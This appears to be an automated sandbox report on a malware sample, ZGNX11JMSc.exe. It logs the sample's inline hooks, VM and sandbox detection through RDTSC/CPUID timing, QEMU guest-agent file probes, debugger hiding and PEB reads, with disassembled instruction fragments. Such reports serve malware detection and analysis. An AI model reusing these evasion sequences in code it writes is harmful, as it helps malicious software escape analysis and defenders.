Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02061205 push edx; ret 1_2_02061231
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02065A03 push edx; ret 1_2_02065A31
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02066214 push edx; ret 1_2_02066241
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02064A13 push edx; ret 1_2_02064A41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02063213 push edx; ret 1_2_02063241
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02061A13 push edx; ret 1_2_02061A41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02060218 push edx; ret 1_2_02060241
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02063A24 push edx; ret 1_2_02063A51
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02062224 push edx; ret 1_2_02062251
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02060A24 push edx; ret 1_2_02060A51
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02066A24 push edx; ret 1_2_02066A51
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02065225 push edx; ret 1_2_02065251
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02064233 push edx; ret 1_2_02064261
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02062A33 push edx; ret 1_2_02062A61
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02061233 push edx; ret 1_2_02061261
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02065A33 push edx; ret 1_2_02065A61
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02064A44 push edx; ret 1_2_02064A71
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02063244 push edx; ret 1_2_02063271
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02061A44 push edx; ret 1_2_02061A71
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02066244 push edx; ret 1_2_02066271
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02060248 push edx; ret 1_2_02060271
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02063A54 push edx; ret 1_2_02063A81
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02062254 push edx; ret 1_2_02062281
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02066A54 push edx; ret 1_2_02066A81
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02065253 push edx; ret 1_2_02065281
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02060A58 push edx; ret 1_2_02060A81
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02065A64 push edx; ret 1_2_02065A91

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEE
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408FD TerminateProcess, 1_2_022408FD
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022468CC NtWriteVirtualMemory, 1_2_022468CC
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022442CD NtWriteVirtualMemory, 1_2_022442CD
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B1A NtWriteVirtualMemory, 1_2_02241B1A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B5F NtWriteVirtualMemory, 1_2_02241B5F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022443F1 NtWriteVirtualMemory, 1_2_022443F1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247036 NtWriteVirtualMemory, 1_2_02247036
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244071 NtWriteVirtualMemory, 1_2_02244071
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240845 TerminateProcess, 1_2_02240845
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408B3 TerminateProcess, 1_2_022408B3
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408E2 TerminateProcess, 1_2_022408E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224790A 1_2_0224790A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02242958 NtWriteVirtualMemory, 1_2_02242958
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241E2C NtWriteVirtualMemory, 1_2_02241E2C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224767B 1_2_0224767B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02246F9E 1_2_02246F9E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240C24 TerminateProcess, 1_2_02240C24
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224742D 1_2_0224742D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224341B NtWriteVirtualMemory, 1_2_0224341B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224251E NtWriteVirtualMemory, 1_2_0224251E
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000022401BE second address: 00000000022401BE instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000022470C1 second address: 00000000022470D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002248DB2 second address: 0000000002248DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002248DFF second address: 0000000002248DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007FA2E4BBF2EFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002247A0D second address: 0000000002247A0D instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002247D7F second address: 0000000002247D7F instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002248035 second address: 0000000002248035 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002240ADA second address: 0000000002240ADA instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002240DB2 second address: 0000000002240DB2 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002241092 second address: 0000000002241092 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 000000000224110D second address: 000000000224110D instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000000567062 second address: 000000000056707C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add dword ptr [ebp+0000019Dh], 431ADB4Eh 0x00000014 pushad 0x00000015 mov edx, 0000008Fh 0x0000001a rdtsc
Tries to detect Any.run
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ZGNX11JMSc.exe, 00000001.00000002.623763596.0000000002250000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: ZGNX11JMSc.exe, 00000001.00000002.623763596.0000000002250000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000022401BE second address: 00000000022401BE instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000022470C1 second address: 00000000022470D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002248DB2 second address: 0000000002248DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002248DFF second address: 0000000002248DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007FA2E4BBF2EFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002247A0D second address: 0000000002247A0D instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000022475BB second address: 00000000022475BB instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 52600CA0h 0x00000013 xor eax, 275578A5h 0x00000018 xor eax, AF7E784Ah 0x0000001d xor eax, DA4B0C4Eh 0x00000022 cpuid 0x00000024 jmp 00007FA2E4BBF35Eh 0x00000026 test dl, dl 0x00000028 bt ecx, 1Fh 0x0000002c test dx, ax 0x0000002f jc 00007FA2E4BBF90Eh 0x00000035 test bx, bx 0x00000038 test eax, ebx 0x0000003a popad 0x0000003b call 00007FA2E4BBF45Ah 0x00000040 lfence 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002247D7F second address: 0000000002247D7F instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002248035 second address: 0000000002248035 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002240ADA second address: 0000000002240ADA instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002240DB2 second address: 0000000002240DB2 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000002241092 second address: 0000000002241092 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 000000000224110D second address: 000000000224110D instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000005675BB second address: 00000000005675BB instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 52600CA0h 0x00000013 xor eax, 275578A5h 0x00000018 xor eax, AF7E784Ah 0x0000001d xor eax, DA4B0C4Eh 0x00000022 cpuid 0x00000024 jmp 00007FA2E439A94Eh 0x00000026 test dl, dl 0x00000028 bt ecx, 1Fh 0x0000002c test dx, ax 0x0000002f jc 00007FA2E439AEFEh 0x00000035 test bx, bx 0x00000038 test eax, ebx 0x0000003a popad 0x0000003b call 00007FA2E439AA4Ah 0x00000040 lfence 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000000566FB5 second address: 0000000000567020 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov ebx, 9A3693F5h 0x00000008 cmp cx, cx 0x0000000b sub ebx, C476974Ah 0x00000011 test ax, 00008AFBh 0x00000015 sub ebx, E4232D93h 0x0000001b add ebx, 0E643128h 0x00000021 mov bx, word ptr [edx+ebx] 0x00000025 mov ax, word ptr [eax] 0x00000028 cmp dl, FFFFFFB4h 0x0000002b xor ax, cx 0x0000002e cmp bx, cx 0x00000031 xor bx, ax 0x00000034 mov word ptr [ebp+00000275h], di 0x0000003b mov di, 3896h 0x0000003f xor di, 7DA2h 0x00000044 test dx, ax 0x00000047 xor di, 97D1h 0x0000004c cmp cx, cx 0x0000004f xor di, 88A8h 0x00000054 pushad 0x00000055 mov si, 5497h 0x00000059 cmp si, 5497h 0x0000005e jne 00007FA2E4BBEECAh 0x00000064 popad 0x00000065 pushad 0x00000066 mov edx, 000000DBh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000000567020 second address: 0000000000566FB5 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp bx, di 0x00000006 mov di, word ptr [ebp+00000275h] 0x0000000d je 00007FA2E439A936h 0x0000000f inc cx 0x00000011 jmp 00007FA2E439A899h 0x00000016 test al, A3h 0x00000018 mov eax, dword ptr [ebp+64h] 0x0000001b pushad 0x0000001c mov edx, 00000063h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000000567062 second address: 000000000056707C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add dword ptr [ebp+0000019Dh], 431ADB4Eh 0x00000014 pushad 0x00000015 mov edx, 0000008Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 000000000056707C second address: 000000000056707C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 sub dword ptr [ebp+0000019Dh], 293F2C89h 0x0000000d sub dword ptr [ebp+0000019Dh], E4024E33h 0x00000017 pushad 0x00000018 mov bh, 30h 0x0000001a cmp bh, 00000030h 0x0000001d jne 00007FA2E4397793h 0x00000023 popad 0x00000024 cmp ebx, dword ptr [ebp+0000019Dh] 0x0000002a jnl 00007FA2E439A929h 0x0000002c add ebx, 02h 0x0000002f jmp 00007FA2E439A8BFh 0x00000031 test bh, 0000005Ch 0x00000034 xor word ptr [eax+ebx], cx 0x00000038 test dl, FFFFFF99h 0x0000003b mov dword ptr [ebp+0000019Dh], CA26A2BDh 0x00000045 test bx, ax 0x00000048 pushad 0x00000049 nop 0x0000004a nop 0x0000004b mov eax, 00000001h 0x00000050 cpuid 0x00000052 popad 0x00000053 add dword ptr [ebp+0000019Dh], 431ADB4Eh 0x0000005d pushad 0x0000005e mov edx, 0000008Fh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408FD rdtsc 1_2_022408FD
Source: ZGNX11JMSc.exe, 00000001.00000002.623763596.0000000002250000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: ZGNX11JMSc.exe, 00000024.00000002.1042829626.00000000009F8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: ZGNX11JMSc.exe, 00000024.00000003.1031145557.0000000000A43000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW,
Source: ZGNX11JMSc.exe, 00000001.00000002.623763596.0000000002250000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408FD rdtsc 1_2_022408FD
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189A00 NtProtectVirtualMemory,LdrInitializeThunk, 36_2_1E189A00
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02246B93 mov eax, dword ptr fs:[00000030h] 1_2_02246B93
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022450CA mov eax, dword ptr fs:[00000030h] 1_2_022450CA
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02242958 mov eax, dword ptr fs:[00000030h] 1_2_02242958
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022471A9 mov eax, dword ptr fs:[00000030h] 1_2_022471A9
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224341B mov eax, dword ptr fs:[00000030h] 1_2_0224341B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247D52 mov eax, dword ptr fs:[00000030h] 1_2_02247D52
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14AA16 mov eax, dword ptr fs:[00000030h] 36_2_1E14AA16
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14AA16 mov eax, dword ptr fs:[00000030h] 36_2_1E14AA16
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E163A1C mov eax, dword ptr fs:[00000030h] 36_2_1E163A1C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17A61C mov eax, dword ptr fs:[00000030h] 36_2_1E17A61C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17A61C mov eax, dword ptr fs:[00000030h] 36_2_1E17A61C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14C600 mov eax, dword ptr fs:[00000030h] 36_2_1E14C600
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14C600 mov eax, dword ptr fs:[00000030h] 36_2_1E14C600
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14C600 mov eax, dword ptr fs:[00000030h] 36_2_1E14C600
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E178E00 mov eax, dword ptr fs:[00000030h] 36_2_1E178E00
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E158A0A mov eax, dword ptr fs:[00000030h] 36_2_1E158A0A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1FFE3F mov eax, dword ptr fs:[00000030h] 36_2_1E1FFE3F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14E620 mov eax, dword ptr fs:[00000030h] 36_2_1E14E620
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E218A62 mov eax, dword ptr fs:[00000030h] 36_2_1E218A62
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1D4257 mov eax, dword ptr fs:[00000030h] 36_2_1E1D4257
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149240 mov eax, dword ptr fs:[00000030h] 36_2_1E149240
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149240 mov eax, dword ptr fs:[00000030h] 36_2_1E149240
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149240 mov eax, dword ptr fs:[00000030h] 36_2_1E149240
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149240 mov eax, dword ptr fs:[00000030h] 36_2_1E149240
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h] 36_2_1E157E41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h] 36_2_1E157E41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h] 36_2_1E157E41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h] 36_2_1E157E41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h] 36_2_1E157E41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h] 36_2_1E157E41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E18927A mov eax, dword ptr fs:[00000030h] 36_2_1E18927A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h] 36_2_1E16AE73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h] 36_2_1E16AE73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h] 36_2_1E16AE73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h] 36_2_1E16AE73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h] 36_2_1E16AE73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15766D mov eax, dword ptr fs:[00000030h] 36_2_1E15766D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1FB260 mov eax, dword ptr fs:[00000030h] 36_2_1E1FB260
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1FB260 mov eax, dword ptr fs:[00000030h] 36_2_1E1FB260
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17D294 mov eax, dword ptr fs:[00000030h] 36_2_1E17D294
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17D294 mov eax, dword ptr fs:[00000030h] 36_2_1E17D294
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E210EA5 mov eax, dword ptr fs:[00000030h] 36_2_1E210EA5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E210EA5 mov eax, dword ptr fs:[00000030h] 36_2_1E210EA5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E210EA5 mov eax, dword ptr fs:[00000030h] 36_2_1E210EA5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DFE87 mov eax, dword ptr fs:[00000030h] 36_2_1E1DFE87
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15AAB0 mov eax, dword ptr fs:[00000030h] 36_2_1E15AAB0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15AAB0 mov eax, dword ptr fs:[00000030h] 36_2_1E15AAB0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17FAB0 mov eax, dword ptr fs:[00000030h] 36_2_1E17FAB0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h] 36_2_1E1452A5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h] 36_2_1E1452A5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h] 36_2_1E1452A5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h] 36_2_1E1452A5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h] 36_2_1E1452A5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C46A7 mov eax, dword ptr fs:[00000030h] 36_2_1E1C46A7
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1736CC mov eax, dword ptr fs:[00000030h] 36_2_1E1736CC
